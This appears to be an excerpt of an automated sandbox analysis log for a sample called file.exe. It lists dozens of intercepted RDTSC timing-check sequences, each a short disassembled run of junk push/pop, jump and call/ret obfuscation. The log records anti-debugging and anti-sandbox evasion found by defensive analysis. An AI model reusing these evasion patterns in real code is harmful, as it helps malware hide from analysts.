Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83C3C7, second address: 83C3FA, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 pop eax; 0x00000007 mov eax, dword ptr [esp+04h]; 0x0000000b ja 00007F57D451A1CCh; 0x00000011 mov eax, dword ptr [eax]; 0x00000013 push eax; 0x00000014 push edx; 0x00000015 jbe 00007F57D451A1BCh; 0x0000001b push eax; 0x0000001c push edx; 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83C3FA, second address: 83C3FE, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83C3FE, second address: 83C408, instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 jg 00007F57D451A1B6h; 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83C4D9, second address: 83C4E5, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pop ecx; 0x00000005 pop edi; 0x00000006 push eax; 0x00000007 push eax; 0x00000008 push edx; 0x00000009 pushad; 0x0000000a push eax; 0x0000000b push edx; 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83C4E5, second address: 83C4EC, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pushad; 0x00000005 popad; 0x00000006 popad; 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83C4EC, second address: 83C50A, instructions: 0x00000000 rdtsc; 0x00000002 pushad; 0x00000003 jmp 00007F57D4F134E9h; 0x00000008 push eax; 0x00000009 push edx; 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83C50A, second address: 83C525, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 popad; 0x00000005 pop edx; 0x00000006 pop eax; 0x00000007 nop; 0x00000008 mov edi, dword ptr [ebp+122D3A06h]; 0x0000000e push 00000000h; 0x00000010 push 9C17DF92h; 0x00000015 push eax; 0x00000016 push edx; 0x00000017 push ecx; 0x00000018 push edi; 0x00000019 pop edi; 0x0000001a pop ecx; 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83C702, second address: 83C730, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pop ebx; 0x00000005 mov eax, dword ptr [eax]; 0x00000007 jmp 00007F57D4F134E9h; 0x0000000c mov dword ptr [esp+04h], eax; 0x00000010 push eax; 0x00000011 push edx; 0x00000012 jbe 00007F57D4F134D8h; 0x00000018 push edi; 0x00000019 pop edi; 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CE4E second address: 85CE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85ABFB second address: 85AC14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85AC14 second address: 85AC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85AC1A second address: 85AC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jc 00007F57D4F134E2h 0x0000000d jns 00007F57D4F134D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B314 second address: 85B31A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B31A second address: 85B31F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B31F second address: 85B339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F57D451A1C1h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B339 second address: 85B349 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134DBh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B4BD second address: 85B4DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jo 00007F57D451A1B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F57D451A1C0h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85B4DD second address: 85B4E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82BFA4 second address: 82BFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1C0h 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82BFBC second address: 82BFC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82BFC0 second address: 82BFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F57D451A1C5h 0x0000000e jno 00007F57D451A1BAh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82BFE8 second address: 82C006 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F57D4F134D6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF58 second address: 85BF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF60 second address: 85BF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BF69 second address: 85BF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C6AA second address: 85C6B4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F57D4F134D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C6B4 second address: 85C6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F57D451A1C8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C6D4 second address: 85C6D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C6D8 second address: 85C6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F57D451A1BBh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C6EE second address: 85C705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D4F134E1h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CCC5 second address: 85CCD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1BAh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CCD5 second address: 85CCDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F57D4F134D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860903 second address: 860918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push esi 0x00000008 jmp 00007F57D451A1BCh 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860918 second address: 860941 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F57D4F134DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F57D4F134E3h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860941 second address: 860971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F57D451A1C2h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860971 second address: 860975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 860975 second address: 86097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 832D89 second address: 832DA8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F57D4F134E6h 0x00000008 pop edi 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8688BF second address: 8688CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8688CC second address: 8688E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134E8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869000 second address: 86902C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F57D451A1BCh 0x0000000b jnc 00007F57D451A1B6h 0x00000011 popad 0x00000012 jc 00007F57D451A1E6h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F57D451A1C2h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86902C second address: 86903C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F57D4F134D6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869BA3 second address: 869BA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869BA8 second address: 869BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F57D4F134D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F57D4F134ECh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869BD4 second address: 869BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1BAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A056 second address: 86A05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A05C second address: 86A064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A116 second address: 86A136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F57D4F134E3h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A2B0 second address: 86A2CF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F57D451A1B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F57D451A1C0h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A97D second address: 86A981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A981 second address: 86A985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A985 second address: 86A98B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A98B second address: 86A9A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86A9A3 second address: 86A9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86AC26 second address: 86AC46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D451A1C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86AC46 second address: 86AC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86BD81 second address: 86BD86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86BD86 second address: 86BD8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86DBB9 second address: 86DBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F27B second address: 86F286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F57D4F134D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F286 second address: 86F2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F57D451A1B8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 pushad 0x00000023 mov bx, dx 0x00000026 popad 0x00000027 push 00000000h 0x00000029 js 00007F57D451A1B6h 0x0000002f push 00000000h 0x00000031 jmp 00007F57D451A1C2h 0x00000036 xor dword ptr [ebp+122D19F6h], edx 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e pushad 0x0000003f jns 00007F57D451A1B6h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F2E4 second address: 86F308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007F57D4F134E9h 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86F308 second address: 86F319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86FCF8 second address: 86FD0A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F57D4F134D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F57D4F134DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87057D second address: 870589 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870589 second address: 87058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874896 second address: 87489B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87489B second address: 8748BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F57D4F134D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F57D4F134E4h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8757BB second address: 8757BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8757BF second address: 8757D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F57D4F134DEh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F70D second address: 82F724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1C2h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 875932 second address: 875936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878DEE second address: 878DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878EA2 second address: 878EA8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878EA8 second address: 878EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1BFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879D88 second address: 879D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F57D4F134DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879D99 second address: 879D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879D9F second address: 879DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B03A second address: 87B043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BF14 second address: 87BF3E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F57D4F134DAh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F57D4F134DFh 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F57D4F134D6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B043 second address: 87B071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F57D451A1BEh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jg 00007F57D451A1C5h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DD43 second address: 87DDDD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F57D4F134E7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F57D4F134DAh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F57D4F134D8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b call 00007F57D4F134E2h 0x00000030 jnc 00007F57D4F134D8h 0x00000036 pop edi 0x00000037 pushad 0x00000038 mov dword ptr [ebp+124702E8h], ebx 0x0000003e popad 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F57D4F134D8h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b push 00000000h 0x0000005d mov edi, dword ptr [ebp+122D3976h] 0x00000063 xchg eax, esi 0x00000064 push eax 0x00000065 push edx 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DDDD second address: 87DDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DDE2 second address: 87DDE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DDE8 second address: 87DDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87ED4B second address: 87EDAC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F57D4F134D8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+122D19F0h], ebx 0x0000002b mov ebx, dword ptr [ebp+122D2B58h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F57D4F134D8h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 jbe 00007F57D4F134D8h 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DF4E second address: 87DF61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F57D451A1BFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87EDAC second address: 87EDB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F57D4F134D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87FDB6 second address: 87FDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F57D451A1B6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, 03D4h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F57D451A1B8h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000019h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f xor bl, FFFFFFF2h 0x00000032 push 00000000h 0x00000034 sub dword ptr [ebp+122D1A74h], ecx 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edi 0x0000003f pop edi 0x00000040 pop eax 0x00000041 rdtsc
